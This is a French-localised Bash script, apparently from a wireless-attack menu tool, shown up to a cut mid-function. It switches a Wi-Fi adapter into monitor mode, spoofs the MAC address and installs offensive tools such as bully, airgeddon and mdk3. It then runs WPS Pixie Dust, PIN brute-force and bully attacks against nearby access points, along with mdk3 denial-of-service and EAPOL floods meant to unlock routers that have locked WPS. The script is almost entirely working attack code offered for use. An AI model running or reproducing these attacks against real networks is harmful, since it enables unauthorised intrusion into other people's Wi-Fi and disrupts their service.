#! /bin/bash

WLANNM=$(cat /root/lscript/wlanmon.txt)
export WLANNM
SCW=1
function defaults_lh3
{
#chemin pour lscript
	LPATH="/root/lscript"
	export LPATH
#chemin pour les raccourcis clavier
	KSPATH=""$LPATH"/ks"
	export KSPATH
#s'assurer que le kspath est défini
	if [[ ! -d "$KSPATH" ]]
	then
		mkdir "$KSPATH"
	fi
#PARAMÈTRES DE SUPPORT D'ALFA
	if [[ -f "$LPATH"/settings/AWUS036ACH.txt ]]
	then
		read ALFA < "$LPATH"/settings/AWUS036ACH.txt
	else
		ALFA="no"
	fi
#début Jaune 
	YS="\e[1;33m"
#début Bleu 
	BS="\e[0;34m"
#couleur de fin
	CE="\e[0m"
#début Rouge
	RS="\e[1;31m"
#début Noir
	BLS="\e[0;30m"
#début Gris Foncé
	DGYS="\e[1;30m"
#début Bleu Clair
	LBS="\e[1;34m"
#début Vert
	GNS="\e[0;32m"
#début Vert Clair
	LGNS="\e[1;32m"
#début Cyan
	CYS="\e[0;36m"
#début Cyan Clair
	LCYS="\e[1;36m"
#début Rouge Clair
	DRS="\e[0;31m"
#début Violet
	PS="\e[0;35m"
#début Violet Clair
	LPS="\e[1;35m"
#début Marron
	BRS="\e[0;33m"
#début Gris Clair
	LGYS="\e[0;37m"
#début Blanc
	WHS="\e[1;37m"
#définition d'une couleur personnalisée pour le logo
	if [[ -f "$LPATH"/settings/logocolor.txt ]]
	then
		read COL < "$LPATH"/settings/logocolor.txt
	else
		COL="$RS"
	fi
#réglage variables fréquentes
	YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Entrer"$CE"=yes)"
	YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Entrer"$CE"=no)"
	YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
	PAKT="Appuyez sur "$YS"une touche$CE pour"
	PAKTC="Appuyez sur "$YS"une touche$CE pour continuer..."
	PAKTGB="Appuyez sur "$YS"une touche$CE pour revenir en arrière..."
	TNI=""$RS"L'outil n'est pas installé. Pour l'installer, tapez '"$CE""$YS"install"$CE""$RS"'."$CE""
#code à lire depuis le clavier sans retour
	READAK="read -n 1"
#adresse MAC par défaut lors du démarrage du mode moniteur
	DEFMAC="00:11:22:33:44:55"
	
	wififb="wififb"
	
#paquets par défaut à injecter par seconde lors du déverrouillage wps avec mdk3
	DPPS=400
}
function enable2_wlan
{
	echo -e "Activation de $WLANN..."
	rfkill unblock wifi &> /dev/null; rfkill unblock all &> /dev/null
	ifconfig $WLANN up &>/dev/null && echo -e ""$YS"Done"$CE"" && O4=1  || echo -e ""$RS"Error. I can't find your wireless adapter"$CE""
}
function start2_menu
{
	echo -e "Activation de $WLANNM..."
	enable2_wlan
	echo -e "Killing services..."
	airmon-ng check kill &> /dev/null && echo -e ""$YS"Done"$CE"" && O1=1
	echo -e "Démarrage du mode moniteur..."
	if [[ "$ALFA" = "yes" ]]
	then
		ifconfig $WLANN down
		iwconfig $WLANN mode monitor &> /dev/null && echo -e ""$YS"Fait"$CE"" && O2=1
		ifconfig $WLANN up
	else
		airmon-ng start $WLANN | grep "monitor mode" | awk -F "(" {'print $2'} | cut -d ')' -f1 &> /dev/null && echo -e ""$YS"Fait"$CE"" && O2=1
	fi
	echo -e "Changing mac address of $WLANNM to 00:11:22:33:44:55..."
	ifconfig $WLANNM down
	macchanger -m 00:11:22:33:44:55 $WLANNM | grep "New MAC:" &> /dev/null && O3=1
	ifconfig $WLANNM up && echo -e ""$YS"Fait"$CE"" 
}
function stop2_menu
{
	stop2_monitor
	echo -e "Modification de l'adresse mac de $WLANN par l'adresse d'origine..."
	ifconfig $WLANN down
	macchanger -p $WLANN | grep "Current MAC:" && O1=1
	ifconfig $WLANN up
	echo -e ""$YS"Fait"$CE""
}
function stop2_monitor
{
	echo -e "Désactivation de $WLANNM..."
	echo -e "Arrêt du mode moniteur..."
	if [[ "$ALFA" = "yes" ]]
	then
		A1=0
		A2=0
		A3=0
		ifconfig $WLANN down && A1=1
		iwconfig $WLANN mode managed && A2=1
		ifconfig $WLANN up && A3=1
		if [[ "$A1" = 1 && "$A2" = 1 && "$A3" = 1 ]]
		then
			echo -e ""$YS"Fait"$CE"" && O2=1
		else
			echo -e ""$RS"Erreur pendant l'arrêt du mode moniteur."$CE""
		fi
	else
		airmon-ng stop $WLANNM &>/dev/null && echo -e ""$YS"Done"$CE"" && O2=1 || echo -e ""$RS"Erreur pendant l'arrêt du mode moniteur."$CE""
	fi
	echo -e "Lancement du service network-manager..."
	service network-manager start && echo -e ""$YS"Done"$CE"" && O3=1 || echo -e ""$RS"Erreur pendant le lancement du service network-manager"$CE""
}
function install_bully
{
	if [[ -d "/root/bully" ]]
	then
		echo -e "Retrait de l'ancien..."
		echo -e "$PAKTC"
		$READAK
		rm -r /root/bully
	fi				
	echo -e "Installation de Bully"
	echo -e "Outil fait par Aanarchyy"
	cd
	git clone https://github.com/aanarchyy/bully.git
	cd /root/bully/src
	make
	sudo make install	
	cd	
}
function install_wifiautopwner
{
	if [[ -d "/root/WiFi-autopwner" ]]
	then
		echo -e "Retrait de l'ancien..."
		echo -e "$PAKTC"
		$READAK
		rm -r /root/WiFi-autopwner
	fi		
	echo -e "Installation WiFi-autopwner"
	echo -e "Outil fait par Mi-Al"
	cd
	git clone https://github.com/Mi-Al/WiFi-autopwner.git
}
function install_vmr
{
	if [[ -d /root/mdk3-v6 || -d /root/VMR ]]
	then
		echo -e "Retrait de l'ancien..."
		echo -e "$PAKTC"
		$READAK
		rm -r /root/mdk3-v6
		if [[ -f /root/VMR-MDK-K2-2017R-012x2.zip ]]
		then
			rm /root/VMR-MDK-K2-2017R-012x2.zip
		fi
		if [[ -d /root/VMR ]]
		then
			rm -r /root/VMR
		fi
	fi
	cd
	wget https://github.com/musket33/VMR-MDK-Kali2-Kali2016/raw/master/VMR-MDK-K2-2017R-012x2.zip
	unzip /root/VMR-MDK-K2-2017R-012x2.zip -d /root/VMR
	cp -r /root/VMR/mdk3-v6 /root/
	cd /root/mdk3-v6
	make
	make install
	chmod 755 /root/mdk3-v6/*
	chmod +x /root/VMR/*.sh
	cd
}
function install_airgeddon
{
	if [[ -d "/root/airgeddon" ]]
	then
		echo -e "Retrait de l'ancien..."
		echo -e "$PAKTC"
		$READAK
		rm -r /root/airgeddon
	fi
	echo -e "Installation..."
	sleep 1
	echo -e "Installation de Airgeddon"
	echo -e "Outil fait par v1s1t0r1sh3r3"
	cd
	git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
	cd airgeddon
	chmod +x airgeddon.sh
}
function dash_calc
{
	
	size=${#TERMINALTITLE}
	calc=$(( 65-size ))
	calc=$(( calc/2 ))
	numcalc=1
	DASHESN="-"
	while [ $numcalc != $calc ]
	do
		DASHESN=""$DASHESN"-"
		numcalc=$(( numcalc+1 ))
	done
	echo -e "$DASHESN"$RS"$TERMINALTITLE"$CE"$DASHESN"
}
function scan_wash
{
	while true
	do
	if [[ "$SCW" != 0 ]]
	then
		clear
		echo -e "Scan dans un nouveau terminal..."
		echo -e ""$YS"APPUYEZ SUR CTRL C PENDANT LE SCAN QUAND VOUS ETES PRET."$CE""
		sleep 1
		xterm -geometry 80x25+9999+9999 -T "Appuyez sur Ctrl C quand vous êtes prêt" -e "wash  -i $WLANNM | tee /root/lscript/tempwash "
	fi
		SCW=1
		clear
		wash_awk
		if [[ "$lines" = 0 ]]
		then
			echo -e ""$RS"Aucun réseau avec WPS trouvé à proximité"$CE""
		fi
		echo -e ""$YS" r"$CE") Rescanner"
		echo -e ""$YS" b"$CE") Retour"
		echo -e "Choix: "
		read WASHSCAN
		if [[ "$WASHSCAN" = "r" ]]
		then
			continue
		elif [[ "$WASHSCAN" = "back" || "$WASHSCAN" = "b" ]]
		then
			SCW=0
			break
		elif [[ "$WASHSCAN" -ge 1 ]]
		then
			if [[ "$WASHSCAN" -gt "$lines" ]]
			then
				echo -e ""$RS"Mauvais choix..."$CE""
				SCW=0
				sleep 2
				continue
			fi
			WASHSCAN2="${SORTED[$WASHSCAN]}"
			BSSIDT="${abssid[$WASHSCAN2]}"
			CHANT="${achannel[$WASHSCAN2]}"
			ESSIDT="${aessid[$WASHSCAN2]}"
			export BSSIDT
			export CHANT
			export ESSIDT
			if [[ ! "${alock[WASHSCAN2]}" = "No" ]]
			then
				clear
				echo -e ""$RS"Ce Point d'Accès est verrouillé"$CE""
				sleep 1
				SCW=0
				echo -e "Voulez-vous essayer de le déverrouiller?"$YNYES""
				read UNW
				if [[ ! "$UNW" = "n" ]]
				then
					unlock_wps
				fi
				continue
			fi
			while true
			do
				clear
				echo -e ""$RS"----------Vous avez besoin d'une connexion forte------------"$CE""
				echo -e ""$YS" 1"$CE") Pixie dust                            Rapide"
				echo -e ""$YS" 2"$CE") Boucle Pixie jusqu'à trouver le pin   Rapide"
				echo -e ""$YS" 3"$CE") Bruteforce                              Lent"
				echo -e ""$YS" 4"$CE") Bully"
				echo -e ""$YS" r"$CE") Rescanner"
				echo -e ""$YS" b"$CE") Retour"
				echo -e "Choix: "
				read WPSL
				if [[ "$WPSL" = "r" ]]
				then
					RESCAN=1
					SCW=1
					break
				elif [[ "$WPSL" = "back" || "$WPSL" = "b" ]]
				then
					RESCAN=1
					SCW=0
					break
				elif [[ "$WPSL" = "1" ]]
				then
					pixie_attack
				elif [[ "$WPSL" = "2" ]]
				then
					pixie_loop
				elif [[ "$WPSL" = "3" ]]
				then
					reaver_attack
				elif [[ "$WPSL" = "4" ]]
				then
					bully_script
				fi		
			done
			if [[ "$RESCAN" = 1 ]]
			then
				RESCAN=0
				continue
			else
				break
			fi
		else
			SCW=0
		fi
	done
}
function unlock_wps
{
while true
do
	clear
	TERMINALTITLE="WPS DÉBLOQUÉ"
	dash_calc
	printf '\033]2;WPS DÉBLOQUÉ\a'
	echo -e ""$BS"2 ou 3 interfaces réseau sont recommandées pour cette attaque"$CE""
	echo -e ""
	if [[ "$INTS" = "" ]]
	then
		INTS=1
	fi
	echo -e ""$YS"set"$CE") Définir votre interface(s)                   Current:"$INTS""
	echo -e ""$YS" ch"$CE") Vérifiez s'il est déverrouillé"
	#~ echo -e ""$YS"  t"$CE") Définir le timeout de l'attaque              Current:"$TM" secs"
	echo -e ""$BS"Attaques:"$CE""
	echo -e ""$YS" 1"$CE") Flood DOS"
	echo -e ""$YS" 2"$CE") Lancer le flood EAPOL"
	#~ echo -e ""$YS" 3"$CE") Parce que Michael a échoué (seulement TKIP / AES+TKIP)"
	#~ echo -e ""$YS" 4"$CE") "
	echo -e ""$YS" b"$CE") Retour"
	echo -e "Choix:"
	read UNL
	clear
	if [[ "$UNL" = "b" || "$UNL" = 00 || "$UNL" = 0 ]]
	then
		break
	elif [[ "$UNL" = "ch" || "$UNL" = "c" ]]
	then
		#~ xterm -T "Check if unlocked" -e 'wash -i $WLANNM | grep "$ESSIDT" | awk "{FS=" "} {print $5}" | tee /root/wa.txt'
		#~ T1=$(wash -i $WLANNM | grep "$ESSIDT" | awk -F ' ' '{print $5}')
		#~ if [[ "$T1" == "Yes" ]]
		#~ then
			#~ echo -e ""$RS"Still locked"$CE""
		#~ else
			#~ echo -e ""$YS"Unlocked!!!"$CE""
		#~ fi
		xterm -T "Check if unlocked" -e 'wash -i $WLANNM' & disown
	elif [[ "$UNL" = "1" ]]
	then
		n=0
		while true
		do
			if [[ "$n" = 0 ]]
			then
				xterm -T "DOS flood on $WLANNM" -hold -e 'mdk3 $WLANNM a -a $BSSIDT -m && echo -e "" && echo -e "Close this window manually"' & disown
				n=$((n+1))
				continue
			else
				if [[ "$n" != "$INTS" ]]
				then
					CURIN="${NI[$n]}"
					if [[ "$CURIN" = "" ]]
					then
						echo -e ""$RS"Erreur 15. Interface introuvable."$CE""
						sleep 3
					else
						xterm -T "DOS flood on $CURIN" -hold -e 'mdk3 $CURIN a -a $BSSIDT -m && echo -e "" && echo -e "Close this window manually"' & disown
					fi
				else
					break
				fi
			fi
			n=$((n+1))
		done
	elif [[ "$UNL" = "2" ]]
	then
		echo -e "Paquets à injecter par seconde:("$YS"Entrer"$CE"="$DPPS")"
		read PPS
		if [[ "$PPS" = "" ]]
		then
			PPS="$DPPS"
		fi
		if [[ "$PPS" -le 0 ]]
		then
			echo -e ""$RS"Mauvais choix"$CE""
			sleep 2
			continue
		fi
		export PPS
		n=0
		OFSET=-20
		while true
		do
			OFSET=$((OFSET+20))
			export OFSET
			if [[ "$n" = 0 ]]
			then
				xterm -T "EAPOL start flood on $WLANNM" -geometry 80x11+0+"$OFSET" -hold -e 'mdk3 $WLANNM x 0 -t $BSSIDT -n "$ESSIDT" -s $PPS && echo -e "" && echo -e "Close this window manually"' & disown
				n=$((n+1))
				continue
			else
				if [[ "$n" != "$INTS" ]]
				then
					CURIN="${NI[$n]}"
					export CURIN
					if [[ "$CURIN" = "" ]]
					then
						echo -e ""$RS"Erreur 16. Interface introuvable."$CE""
						sleep 3
					else
						xterm -T "EAPOL start flood on $CURIN" -geometry 80x11+0+"$OFSET" -hold -e 'mdk3 $CURIN x 0 -t $BSSIDT -n "$ESSIDT" -s $PPS && echo -e "" && echo -e "Close this window manually"' & disown
					fi
				else
					break
				fi
			fi
			n=$((n+1))
		done
	elif [[ "$UNL" = "set" ]]
	then
		while true
		do
			clear
			echo -e ""$BS"Numéro d'interface actuel"$CE": "$INTS""
			echo -e ""$YS" a"$CE") Ajouter une autre interface"
			echo -e ""$YS" r"$CE") Reset les interfaces"
			echo -e ""$YS" b"$CE") Retour"
			read NIN
			clear
			if [[ "$NIN" = "b" || "$NIN" = 00 ]]
			then
				break
			elif [[ "$NIN" = "r" ]]
			then
				while true
				do
					newints=$((INTS-1))
					if [[ "$newints" -lt 1 ]]
					then
						echo -e ""$RS"Aucune interface ajoutée à reset"$CE""
						sleep 2
						break
					else
						INTS=1
						break
					fi
				done
			elif [[ "$NIN" = "a" ]]
			then
				echo -e "Nouvelle interface: "
				read NII
				TEST3=$(ifconfig | grep "$NII")
				if [[ "$TEST3" = "" ]]
				then
					echo -e ""$RS"Impossible de trouver cette interface sur votre système"$CE""
					sleep 3
				else
					echo -e ""$BS"Interface trouvée!"$CE""
					sleep 2
					clear
					checkmonitor=$(iwconfig "$NII" | grep "Mode:Monitor")
					if [[ "$checkmonitor" = "" ]]
					then
						echo -e ""$BS"Activation du mode moniteur pour "$NII"..."
						airmon-ng start $NII | grep "monitor mode" | awk -F "(" {'print $2'} | cut -d ')' -f1 &> /dev/null && echo -e ""$YS"Fait"$CE""
						checkmonitor=$(iwconfig "$NII"mon | grep "Mode:Monitor")
						if [[ "$checkmonitor" = "" ]]
						then
							echo -e ""$RS"Impossible de démarrer le mode moniteur"$CE""
							sleep 2
							continue
						fi
					fi
					z=1
					l=0
					while [[ "$z" -le "$INTS" ]]
					do
						if [[ "$NII" == "${NI[$z]}" || "$NII" == "$WLANNM" ]]
						then
							echo -e ""$RS"Interface déjà définie"$CE""
							sleep 2
							l=1
						fi
						z=$((z+1))
					done
					if [[ "$l" = 1 ]]
					then
						continue
					fi
					NI[$INTS]="$NII"
					INTS=$((INTS+1))
				fi
			fi
		done
	fi
done
}
function reaver_attack
{
	clear
	TERMINALTITLE="WPS BRUTEFORCE"
	dash_calc
	printf '\033]2;WPS BRUTEFORCE\a'
	echo -e "Délai entre chaque tentative("$YS"Entrer"$CE"=60): "
	read DELAY
	if [[ "$DELAY" = "" ]]
	then
		DELAY=60
	fi
	#xterm -geometry 90x70+0+0 -e "sleep 5 && aireplay-ng $WLANNM -1 120 -a $BSSIDT" & disown
	reaver -i $WLANNM -b $BSSIDT -c $CHANT -d $DELAY -L -f -N -vvv | tee /root/lscript/wpslog
	echo -e "Appuyez sur "$YS"entrer"$CE" pour revenir en arrière"
	read	
}
function pixie_loop
{
	clear
	TERMINALTITLE="ATTAQUE PAR BOUCLE PIXIE"
	dash_calc
	printf '\033]2;ATTAQUE PAR BOUCLE PIXIE\a'
	echo -e "Délai entre chaque tentative("$YS"Entrer"$CE"=15): "
	read DELAY
	if [[ "$DELAY" = "" ]]
	then
		DELAY=15
	elif [[ ! "$DELAY" -ge 0 ]]
	then
		DELAY=0
	fi
	while true
	do
		trap 'break' SIGINT
		echo "" > "$LPATH"/wpslogloop
		reaver -i $WLANNM -b $BSSIDT -c $CHANT -N -K 1 -f -vvv <<< $'y\n' | tee /root/lscript/wpslogloop
		if [[ -f "$LPATH"/wpslog ]]
		then
			TTT=$(cat "$LPATH"/wpslogloop | grep "WPS pin not found!")
			TTTT=$(cat "$LPATH"/wpslogloop | grep "WPS pin:    <empty>")
			TTT2=$(cat "$LPATH"/wpslogloop | grep "found")
			TTT3=$(cat "$LPATH"/wpslogloop | grep "WPA")
			if [[ "$TTT" != "" || "$TTTT" != "" ]]
			then
				echo -e ""$RS"Pin non trouvé. Nouvelle tentative..."$CE""
			elif [[ "$TTT2" != "" || "$TT3" != "" ]]
			then
				echo -e ""$YS"Pin trouvé!!"$CE""
				cp "$LPATH"/wpslog >> "$LPATH"/wpslog
				sleep 2
				break
			else
				echo -e ""$RS"Pin non trouvé. Nouvelle tentative..."$CE""
			fi
			if [[ "$DELAY" -gt 1 ]]
			then
				echo -e "Attendre "$DELAY" secondes..."
			elif [[ "$DELAY" = 1 ]]
			then
				echo -e "Attendre "$DELAY" seconde..."
			fi
			sleep $DELAY
		else
			echo -e ""$RS"Erreur 10. Impossible de localiser le fichier wpslogloop."$CE""
			sleep 4
			break
		fi
	done
	trap - SIGINT
	echo -e "Appuyez sur "$YS"entrer"$CE" pour revenir en arrière"
	read
	
}
function pixie_attack
{
	clear
	TERMINALTITLE="ATTAQUE PIXIE DUST"
	dash_calc
	printf '\033]2;ATTAQUE PIXIE DUST\a'
	#xterm -geometry 90x70+0+0 -e "aireplay-ng $WLANNM -1 10 -a $BSSIDT" & disown
	reaver -i $WLANNM -b $BSSIDT -c $CHANT -N -f --pixie-dust -vvv | tee /root/lscript/wpslog
	echo -e "Appuyez sur "$YS"entrer"$CE" pour revenir en arrière"
	read
}
function reaver_wpastart
{
	reaver -i $WLANNM -b $BSSIDT -c $CHANT -N -p $WPST -L -f -g 1 -d 2 -vvv
	echo -e "$PAKTC"
	read
}
function associate_aireplay
{
	echo -e "Entrez le BSSID de votre cible: "
	read -e BSSIDT
	export BSSIDT
	export -f aireplay_command
	xterm -e bash -c 'aireplay_command; exec bash'
	clear
	exec bash "$0"
}
#~ function wash_awk
#~ {
#~ file="/root/lscript/tempwash"
#~ linestotal=$(cat $file | awk 'END{print NR}')
#~ lines=$((linestotal-7))
#~ n=1
#~ if [[ "$lines" != 0 ]]
#~ then
	#~ echo -e "    BSSID             CH ESSID"
#~ fi
#~ while [ $n -le "$lines" ]
#~ do
	#~ nnn=$((n+7))
	#~ nnum[$n]=$nnn
	#~ abssid[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $1}')
	#~ achannel[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $2}')
	#~ aessid[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $7}')
	#~ ti=7
	#~ while true
	#~ do
		#~ essidtest=$(cat $file | awk -v nn="$nnn" -v po="$ti" '{if(NR==nn)print $po}')
		#~ if [[ "$essidtest" != "" ]]
		#~ then
			#~ aessid[$nnn]="${aessid[$nnn]} $essidtest"
		#~ else
			#~ break
		#~ fi
		#~ ti=$((ti+1))
	#~ done
	#~ alock[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $5}')
	#~ if [[ ! ${alock[$nnn]} = "No" ]]
	#~ then
		#~ locked="$RS"
	#~ else
		#~ locked="$YS"
	#~ fi
	#~ size=${#achannel[$nnn]}
	#~ if [[ "$n" -le 9 ]]
	#~ then
		#~ if [[ "$size" = 2 ]]
		#~ then
			#~ echo -e " "$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]} ${aessid[$nnn]}"$CE""
		#~ else
			#~ echo -e " "$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]}  ${aessid[$nnn]}"$CE""
		#~ fi
	#~ else
		#~ if [[ "$size" = 2 ]]
		#~ then
			#~ echo -e ""$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]} ${aessid[$nnn]}"$CE""
		#~ else
			#~ echo -e ""$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]}  ${aessid[$nnn]}"$CE""
		#~ fi
	#~ fi
	#~ n=$(( n+1 ))
#~ done
#~ }

function wash_awk
{
file="/root/lscript/tempwash"
linestotal=$(cat $file | awk 'END{print NR}')
lines=$((linestotal-2))
n=1
if [[ "$lines" != 0 ]]
then
	echo -e "    BSSID             CH PR ESSID"
fi
while [[ "$n" -le "$lines" ]]
do
	nnn=$((n+2))
	nnum[$n]=$nnn
	abssid[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $1}')
	achannel[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $2}')
	apower[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $3}' | cut -d '-' -f2)
	tempn=${apower[$nnn]}
	apower[$nnn]=$((100-tempn))
	if [[ ${apower[$nnn]} -lt 10 ]]
	then
		apower[$nnn]="${apower[$nnn]} "
	fi
	aessid[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $7 " " $8 " " $9 " " $10 " " $11 " " $12}')
	ti=7
	#~ while true
	#~ do
		#~ essidtest=$(cat $file | awk -v nn="$nnn" -v po="$ti" '{if(NR==nn)print $po}')
		#~ echo "Total = $essidtest"
		#~ if [[ "$essidtest" != "" ]]
		#~ then
			#~ aessid[$nnn]="${aessid[$nnn]} $essidtest"
		#~ else
			#~ break
		#~ fi
		#~ ti=$((ti+1))
	#~ done
	alock[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $5}')
	n=$(( n+1 ))
done
##sorting them according to the power:
n=1
while [[ "$n" -le "$lines" ]]
do
	#~ nnn=$((n+2))
	#~ size=${#achannel[$nnn]}
	#~ if [[ ! ${alock[$nnn]} = "No" ]]
	#~ then
		#~ locked="$RS"
	#~ else
		#~ locked="$YS"
	#~ fi
	#~ if [[ "$n" -le 9 ]]
	#~ then
		#~ if [[ "$size" = 2 ]]
		#~ then
			#~ echo -e " "$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]}  ${apower[$nnn]} ${aessid[$nnn]}"$CE""
		#~ else
			#~ echo -e " "$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]}  ${apower[$nnn]} ${aessid[$nnn]}"$CE""
		#~ fi
	#~ else
		#~ if [[ "$size" = 2 ]]
		#~ then
			#~ echo -e ""$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]}  ${apower[$nnn]} ${aessid[$nnn]}"$CE""
		#~ else
			#~ echo -e ""$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]}  ${apower[$nnn]} ${aessid[$nnn]}"$CE""
		#~ fi
	#~ fi
	n2=1
	VALUE=0
	while [[ "$n2" -le "$lines" ]]
	do
		if [[ "${apower[${nnum[$n2]}]}" -ge "$VALUE" ]]
		then
			VALUE=${apower[${nnum[$n2]}]}
			NUM=${nnum[$n2]}
		fi
		n2=$((n2+1))	
	done
	SORTED[$n]=$NUM
	SORTEDPR[$n]=$VALUE
	apower[$NUM]="-1"
	n=$((n+1))
done
n=1
while [[ "$n" -le "$lines" ]]
do
	#size=${#achannel[${nnum[$n]}]}
	if [[ ! ${alock[${nnum[$n]}]} = "No" ]]
	then
		locked="$RS"
	else
		locked="$YS"
	fi
	if [[ "$n" -le 9 ]]
	then
		if [[ ${achannel[${SORTED[$n]}]} -lt 10 ]]
		then
			echo -e " "$locked""$n""$CE") "$locked"${abssid[${SORTED[$n]}]} ${achannel[${SORTED[$n]}]}  ${SORTEDPR[$n]} ${aessid[${SORTED[$n]}]}"$CE""
		else
			echo -e " "$locked""$n""$CE") "$locked"${abssid[${SORTED[$n]}]} ${achannel[${SORTED[$n]}]} ${SORTEDPR[$n]} ${aessid[${SORTED[$n]}]}"$CE""
		fi
	else
		if [[ ${achannel[${SORTED[$n]}]} -lt 10 ]]
		then
			echo -e ""$locked""$n""$CE") "$locked"${abssid[${SORTED[$n]}]} ${achannel[${SORTED[$n]}]}  ${SORTEDPR[$n]} ${aessid[${SORTED[$n]}]}"$CE""
		else
			echo -e ""$locked""$n""$CE") "$locked"${abssid[${SORTED[$n]}]} ${achannel[${SORTED[$n]}]} ${SORTEDPR[$n]} ${aessid[${SORTED[$n]}]}"$CE""
		fi
	fi
	n=$((n+1))
done
}
function bully_script
{
TERMINALTITLE="BULLY AUTOMATION"
dash_calc
printf '\033]2;BULLY AUTOMATION\a'
while true
do
	clear
	if [[ "$BRUTE" = "" ]]
	then
		BRUTE="OFF"
	fi
	if [[ "$FORCE" = "" ]]
	then
		FORCE="OFF"
	fi
	if [[ "$PIXIE" = "" ]]
	then
		PIXIE="ON"
	fi
	if [[ "$SEQ" = "" ]]
	then
		SEQ="OFF"
	fi
	if [[ "$VERBOSITY" = "" ]]
	then
		VERBOSITY=3
	fi
	if [[ "$IGNORELOCKOUT" = "" ]]
	then
		IGNORELOCKOUT="OFF"
	fi
	if [[ "$LOCKWAIT" = "" ]]
	then
		LOCKWAIT=60
	fi
	if [[ "$WAITPERATTEMPT" = "" ]]
	then
		WAITPERATTEMPT=0
	fi
	if [[ "$BSSIDT" = "" || "$ESSIDT" = "" || "$CHANT" = "" ]]
	then
		OK=0
	else
		OK=1
	fi
	echo -e ""$YS" 1"$CE") Essid                          ACTUEL:"$ESSIDT""
	echo -e ""$YS" 2"$CE") Bssid                          ACTUEL:"$BSSIDT""
	echo -e ""$YS" 3"$CE") Channel                        ACTUEL:"$CHANT""
	echo -e ""$YS" 4"$CE") Bruteforce Checksum digit      ACTUEL:"$BRUTE""
	echo -e ""$YS" 5"$CE") Pixie wps                      ACTUEL:"$PIXIE""
	echo -e ""$YS" 6"$CE") Attente après le verrouillage  ACTUEL:"$LOCKWAIT" secs"
	echo -e ""$YS" 7"$CE") Attente par tentative          ACTUEL:"$WAITPERATTEMPT" secs"
	echo -e ""$YS" 8"$CE") Force                          ACTUEL:"$FORCE""
	echo -e ""$YS" 9"$CE") Séquentiel                     ACTUEL:"$SEQ""
	echo -e ""$YS"10"$CE") Verbosité                      ACTUEL:"$VERBOSITY""
	echo -e ""$YS"11"$CE") Ignorer le verrouillage        ACTUEL:"$IGNORELOCKOUT""
	echo -e ""$YS" b"$CE") Retour"
	echo -e ""$YS"start"$CE") Lancer"
	echo -e "Choix: "
	read B
	clear
	if [[ "$B" = "back" || "$B" = "b" ]]
	then
		clear
		break
	elif [[ "$B" = "start" ]]
	then
		if [[ "$OK" = 0 ]]
		then
			echo -e ""$RS"Erreur 1"$CE""
			sleep 3
		else
			if [[ "$BRUTE" = "ON" ]]
			then
				LBRUTE="-B"
			else
				LBRUTE=""
			fi
			if [[ "$PIXIE" = "ON" ]]
			then
				LPIXIE="-d"
			else
				LPIXIE=""
			fi
			if [[ "$FORCE" = "ON" ]]
			then
				LFORCE="-F"
			else
				LFORCE=""
			fi
			if [[ "$SEQ" = "ON" ]]
			then
				LSEQ="-S"
			else
				LSEQ=""
			fi
			LVERBOSITY="-v $VERBOSITY"
			if [[ "$IGNORELOCKOUT" = "ON" ]]
			then
				LIGNORELOCKOUT="-L"
			else
				LIGNORELOCKOUT=""
			fi
			bully -b $BSSIDT -e $ESSIDT -c $CHANT -v $VERBOSITY -l $LOCKWAIT -1 $WAITPERATTEMPT,1 $LFORCE $LSEQ $LBRUTE $LPIXIE $LIGNORELOCKOUT $WLANNM
			echo -e "$PAKTGB"
			$READAK
		fi
	elif [[ "$B" = 1 ]]
	then
		echo -e "Essid:"
		read ESSIDT
	elif [[ "$B" = 2 ]]
	then
		echo -e "Bssid:"
		read BSSIDT
	elif [[ "$B" = 3 ]]
	then
		echo -e "Channel:"
		read CHANT
	elif [[ "$B" = 4 ]]
	then
		if [[ "$BRUTE" = "ON" ]]
		then
			BRUTE="OFF"
		else
			BRUTE="ON"
		fi
	elif [[ "$B" = 5 ]]
	then
		if [[ "$PIXIE" = "ON" ]]
		then
			PIXIE="OFF"
		else
			PIXIE="ON"
		fi
	elif [[ "$B" = 6 ]]
	then
		echo -e "Attente après verrouillage(en secondes): "
		read LOCKWAIT
	elif [[ "$B" = 7 ]]
	then
		echo -e "Attente par tentative(en secondes): "
		read WAITPERATTEMPT
	elif [[ "$B" = 8 ]]
	then
		if [[ "$FORCE" = "ON" ]]
		then
			FORCE="OFF"
		else
			FORCE="ON"
		fi
	elif [[ "$B" = 9 ]]
	then
		if [[ "$SEQ" = "ON" ]]
		then
			SEQ="OFF"
		else
			SEQ="ON"
		fi
	elif [[ "$B" = 10 ]]
	then
		while true
		do
			echo -e "Verbosité (1-4): "
			read VERB
			clear
			if [[ "$VERB" = 1 || "$VERB" = 2 || "$VERB" = 3 || "$VERB" = 4 ]]
			then
				VERBOSITY="$VERB"
				break
			else
				echo -e "Le nombre doit être 1,2,3 ou 4"
				sleep 3
			fi			
		done
	elif [[ "$B" = 11 ]]
	then
		if [[ "$IGNORELOCKOUT" = "ON" ]]
		then
			IGNORELOCKOUT="OFF"
		else
			IGNORELOCKOUT="ON"
		fi
	fi
	
done
}
function main_wps_options
{
while true
do
clear
TERMINALTITLE="MENU WPS"
dash_calc
printf '\033]2;MENU WPS\a'
if [[ "$ESSIDT" = "" ]]
then
	echo -e ""$YS" 1"$CE") Scanner avec wash         Sélectionné: "$RS"Aucun"$CE""
else
